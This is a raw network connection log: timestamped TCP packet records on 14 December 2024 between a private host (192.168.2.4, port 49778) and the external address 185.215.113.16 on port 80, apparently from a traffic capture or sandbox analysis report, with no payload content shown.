Dec 14, 2024 12:56:17.343106031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.343111038 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.343163013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.344135046 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.344197035 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.344372988 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.344429970 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.345352888 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.345417023 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.345462084 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.345518112 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.346510887 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.346574068 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.346613884 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.346671104 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.347784996 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.347865105 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.477610111 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.477685928 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.477740049 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.477812052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.478317976 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.478377104 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.478394032 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.478441954 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.479412079 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.479500055 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.479551077 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.479687929 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.480635881 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.480655909 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.480706930 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.480739117 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.481770992 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.481836081 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.481857061 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.481913090 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.482981920 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.483055115 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.483067989 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.483135939 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.484123945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.484203100 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.484246969 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.484308958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.485320091 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.485384941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.485481977 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.485543013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.486470938 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.486536026 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.486807108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.486867905 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.487696886 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.487801075 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.487927914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.487927914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.488888979 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.488960981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.489001036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.489064932 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.490051031 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.490115881 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.490240097 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.490303993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.491260052 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.491327047 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.491453886 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.491514921 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.492451906 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.492512941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.492574930 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.492636919 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.493640900 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.493706942 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.493709087 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.493771076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.494790077 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.494852066 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.495007992 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.495069027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.495973110 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.496037006 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.496072054 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.496136904 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.497163057 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.497230053 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.497283936 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.497350931 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.498330116 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.498394012 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.498434067 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.498492956 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.499572039 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.499640942 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.499660969 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.499727011 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.500701904 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.500776052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.500808001 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.500873089 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.501893044 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.501956940 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.502007008 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.502064943 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.503093004 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.503185034 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.503194094 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.503243923 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.504296064 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.504374027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.504405022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.504468918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.505426884 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.505498886 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.505532980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.505600929 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.506624937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.506691933 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.506757975 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.506820917 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.507891893 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.507961988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.507982016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.508049011 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.509011984 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.509074926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.509138107 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.509192944 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.510216951 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.510286093 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.510294914 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.510349035 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.511385918 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.511473894 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.511504889 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.511534929 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.512593031 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.512654066 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.512737036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.512798071 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.513736010 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.513804913 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.513824940 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.513890028 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.515125036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.515197039 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.515207052 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.515269995 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.516158104 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.516223907 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.516268015 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.516330957 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.517297983 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.517364025 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.517487049 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.517545938 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.518507957 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.518568993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.518640995 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.518707991 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.519661903 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.519731045 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.519870043 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.519942045 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.520802021 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.520859957 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.520977974 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.521050930 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.522026062 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.522103071 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.522118092 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.522176981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.523170948 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.523251057 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.523288965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.523353100 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.524477959 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.524490118 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.524547100 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.525536060 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.525605917 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.525679111 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.525743008 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.526767969 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.526835918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.526985884 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.527038097 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.527910948 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.527972937 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.528022051 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.528081894 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.529099941 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.529185057 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.529223919 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.529294014 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.530317068 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.530381918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.530421972 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.530493021 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.531496048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.531558037 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.531642914 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.531703949 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.532754898 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.532828093 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.532896996 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.532958031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.533843994 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.533916950 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.533955097 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.534018993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.535140991 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.535211086 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.535392046 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.535456896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.536185980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.536252975 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.536295891 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.536356926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.537524939 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.537589073 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.537668943 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.537731886 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.538603067 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.538666964 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.538688898 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.538741112 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.539793015 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.539855957 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.669811010 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.669996977 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.670195103 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.670346022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.670361996 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.670409918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.670486927 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.670551062 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.671555996 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.671619892 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.671636105 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.671689987 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.672648907 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.672708988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.672744989 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.672799110 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.673927069 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.673993111 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.674022913 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.674074888 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.675010920 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.675065994 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.675103903 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.675157070 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.676286936 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.676323891 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.676350117 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.676388979 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.677346945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.677401066 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.677453041 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.677503109 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.678507090 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.678564072 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.678666115 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.678720951 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.680188894 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.680207968 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.680248976 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.680248976 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.681107044 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.681164980 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.681195974 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.681251049 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.682173967 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.682226896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.682363033 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.682415009 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.683325052 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.683377981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.683408022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.683459044 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.684504986 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.684556961 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.684592962 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.684643984 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.685679913 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.685734987 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.685780048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.685832977 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.686955929 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.687011957 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.687108040 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.687160969 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.688014030 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.688075066 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.688107014 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.688162088 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.689205885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.689277887 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.689291000 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.689321041 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.690391064 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.690450907 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.690450907 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.690517902 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.691531897 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.691587925 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.691658974 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.691711903 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.692733049 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.692786932 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.692837954 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.692888975 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.693907976 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.693963051 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.694030046 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.694082022 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.695127964 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.695183992 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.695290089 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.695354939 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.696346045 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.696408033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.696417093 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.696468115 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.698215961 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.698271036 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.698322058 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.698373079 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.699609041 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.699665070 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.699680090 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.699733019 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.700489044 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.700548887 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.700573921 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.700625896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.701312065 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.701378107 CET	49778	80	192.168.2.4	185.215.113.16
